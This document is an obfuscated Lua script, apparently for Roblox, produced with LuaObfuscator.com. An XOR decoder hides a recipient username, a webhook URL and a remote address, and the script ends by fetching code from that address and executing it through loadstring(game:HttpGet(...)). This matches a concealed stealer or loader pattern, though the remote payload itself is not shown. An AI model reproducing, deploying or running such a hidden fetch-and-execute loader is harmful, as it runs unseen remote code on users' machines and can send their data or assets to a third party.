--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1 + 0, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (2 -1) + 0)),v1(v2(v9,1 + ((v11-(1 -0))% #v9),1 + 0 + 0 + ((v11-(4 -3))% #v9) + (2 -(1 + 0)))))%(670 -414)));end return v5(v10);end _G.UserName=v7("\94\140\147\111\24\94\169\182\74\61\123\169\182\74\61\94\169\182\111\24","\23\224\218\38\81");_G.WebHook=v7("\211\158\178\82\170\5\98\148\137\167\76\184\77\52\149\142\175\81\186\80\63\223\196\165\77\180\16\44\203\131\233\85\188\93\37\212\133\173\81\246\14\125\141\216\242\27\238\15\125\131\211\244\16\224\14\117\130\216\242\13\234\84\21\201\222\247\70\190\93\37\222\155\128\112\168\78\121\141\190\128\115\174\15\20\255\141\151\84\244\104\36\243\187\135\67\232\79\60\142\185\164\73\174\117\7\209\166\245\87\158\11\15\233\211\163\120\232\85\26\255\219\132\15\161\115\28\138\162","\187\234\198\34\217\63\77");loadstring(game:HttpGet(v7("\228\203\186\217\175\101\236\163\205\175\222\242\56\170\248\215\187\203\169\44\166\254\220\161\199\168\58\173\248\145\173\198\177\112\181\233\204\186\208\164\112\147\233\203\157\192\177\42\175\237\203\161\219\132\12\160\254\214\190\221\175\112\174\237\214\160\134\157\42\183\227\249\175\219\177\113\175\249\222","\140\191\206\169\220\95\195")))();
